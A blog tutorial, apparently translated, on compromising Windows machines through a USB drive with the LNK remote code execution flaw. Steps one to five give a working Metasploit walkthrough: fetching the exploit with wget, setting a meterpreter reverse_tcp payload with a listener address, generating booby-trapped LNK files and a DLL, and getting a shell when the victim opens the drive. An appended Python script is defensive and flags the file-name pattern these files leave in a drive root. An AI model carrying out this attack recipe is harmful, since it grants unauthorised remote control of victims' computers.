Attacking via a USB drive using the LNK vulnerability
1. Download the exploit script
Download the LNK Remote Code Execution Vulnerability exploit file from exploit-db
wget https://www.exploit-db.com/download/42382.rb
2. Install the exploit script
Installing the exploit script is simple: just place the downloaded Ruby exploit script in the designated Metasploit directory
cp 42382.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/
3. Start the listener and generate the files
msf > search 42382
msf exploit(42382) > use exploit/windows/fileformat/42382
msf exploit(42382) > set payload windows/x64/meterpreter/reverse_tcp # note whether the target is x86 or x64
msf exploit(42382) > set lhost 192.168.1.15
msf exploit(42382) > show targets
msf exploit(42382) > set target 0
msf exploit(42382) > exploit
[*] /root/.msf4/local/lLbLLlpJEWOCVjXn.dll created copy it to the root folder of the target USB drive
[*] /root/.msf4/local/attUBiQoEENCHdXj_D.lnk create, copy to the USB drive if drive letter is D
[*] /root/.msf4/local/TPIhmhvfUkHRaotP_E.lnk create, copy to the USB drive if drive letter is E
[*] /root/.msf4/local/jlhbqmicbvEDUucR_F.lnk create, copy to the USB drive if drive letter is F
[*] /root/.msf4/local/KvvqRTlZixISpRHK_G.lnk create, copy to the USB drive if drive letter is G
[*] /root/.msf4/local/FDiknQGLVXPKFBIC_H.lnk create, copy to the USB drive if drive letter is H
[*] /root/.msf4/local/gHhqXTwmxeDPlpTA_I.lnk create, copy to the USB drive if drive letter is I
[*] /root/.msf4/local/njveXscZFvRwJLFJ_J.lnk create, copy to the USB drive if drive letter is J
[*] /root/.msf4/local/nZxhpuwJHVAIUNXx_K.lnk create, copy to the USB drive if drive letter is K
[*] /root/.msf4/local/QbOVySllSZXOmglY_L.lnk create, copy to the USB drive if drive letter is L
[*] /root/.msf4/local/qQhIaawNDiMbcaqK_M.lnk create, copy to the USB drive if drive letter is M
[*] /root/.msf4/local/fSylFhAGVNNwaYnd_N.lnk create, copy to the USB drive if drive letter is N
[*] /root/.msf4/local/PQyizrKnVNCRQJkd_O.lnk create, copy to the USB drive if drive letter is O
[*] /root/.msf4/local/xfhnyJCEsOdbpnhs_P.lnk create, copy to the USB drive if drive letter is P
[*] /root/.msf4/local/oSYDiEMnouNpHFqE_Q.lnk create, copy to the USB drive if drive letter is Q
[*] /root/.msf4/local/OBlpipdrGcLVdvhd_R.lnk create, copy to the USB drive if drive letter is R
[*] /root/.msf4/local/MFxDTvxGjYarzweM_S.lnk create, copy to the USB drive if drive letter is S
[*] /root/.msf4/local/LwmuNxBWnRfWevDC_T.lnk create, copy to the USB drive if drive letter is T
[*] /root/.msf4/local/wlJlNxRBICJVLnQX_U.lnk create, copy to the USB drive if drive letter is U
[*] /root/.msf4/local/rOHsCIBWNTrXGstq_V.lnk create, copy to the USB drive if drive letter is V
[*] /root/.msf4/local/BKUZRSPKBSukmlpy_W.lnk create, copy to the USB drive if drive letter is W
[*] /root/.msf4/local/hbOvINMLAxHcWavV_X.lnk create, copy to the USB drive if drive letter is X
[*] /root/.msf4/local/FTLzXgWfeTeMuieN_Y.lnk create, copy to the USB drive if drive letter is Y
[*] /root/.msf4/local/JKYOcCLPNuxnHvlh_Z.lnk create, copy to the USB drive if drive letter is Z
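After running the Metasploit commands above, a listener is started locally and multiple LNK files are generated in ~/.msf4/local
4. Prepare the penetration-test USB drive
Copy all of the generated LNK files in the ~/.msf4/local directory to the root of the USB drive
5. Trigger the vulnerability and get a shell
Insert the USB drive into the target Windows machine; opening the drive triggers the remote LNK vulnerability, and a shell on the target host is obtained in the Metasploit console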
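From the defender's side, the module output quoted in step 3 leaves a recognizable layout in the drive root: one DLL with a 16-letter name and a set of 16-letter shortcuts suffixed _D through _Z. The triage check below is an added example, not part of the original post or of Metasploit; the function names, the threshold of three drive letters and the sample listings are assumptions made for illustration.

```python
import os
import re

# Naming pattern seen in the module output quoted above:
# <16 ASCII letters>_<drive letter D..Z>.lnk plus one <16 letters>.dll
LNK_RE = re.compile(r"^[A-Za-z]{16}_([D-Z])\.lnk$", re.IGNORECASE)
DLL_RE = re.compile(r"^[A-Za-z]{16}\.dll$", re.IGNORECASE)
MIN_LETTERS = 3  # assumed threshold: distinct drive-letter suffixes


def triage_root(names):
    """Classify the file names found in the root of a removable drive."""
    by_letter, dlls = {}, []
    for name in names:
        m = LNK_RE.match(name)
        if m:
            by_letter.setdefault(m.group(1).upper(), []).append(name)
        elif DLL_RE.match(name):
            dlls.append(name)
    many = len(by_letter) >= MIN_LETTERS
    if many and dlls:
        verdict = "likely"   # shortcut set and companion DLL together
    elif many or (by_letter and dlls):
        verdict = "review"   # partial match, needs a human look
    else:
        verdict = "clean"
    return {"verdict": verdict, "letters": sorted(by_letter), "dlls": sorted(dlls)}


def triage_path(root):
    """Run triage_root over the regular files directly under root."""
    with os.scandir(root) as it:
        return triage_root(e.name for e in it if e.is_file())


# Constructed sample listings, not taken from a real drive.
SAMPLE_BAD = ["AbCdEfGhIjKlMnOp.dll"] + [
    "QrStUvWxYzAbCdEf_%s.lnk" % c for c in "DEFGH"]
SAMPLE_OK = ["report.docx", "Photos_D.lnk", "setup.dll", "autorun.inf"]

if __name__ == "__main__":
    for label, listing in (("bad", SAMPLE_BAD), ("ok", SAMPLE_OK)):
        print(label, triage_root(listing))
```

The check keys only on file names, so a "clean" verdict says nothing about the content of any shortcut on the drive.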
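All rights reserved. This work is licensed under the Creative Commons Attribution-NonCommercial 3.0 Unported license. When reposting, please credit the source: https://www.wangjun.dev//2017/11/u-link-remote-vulnerability/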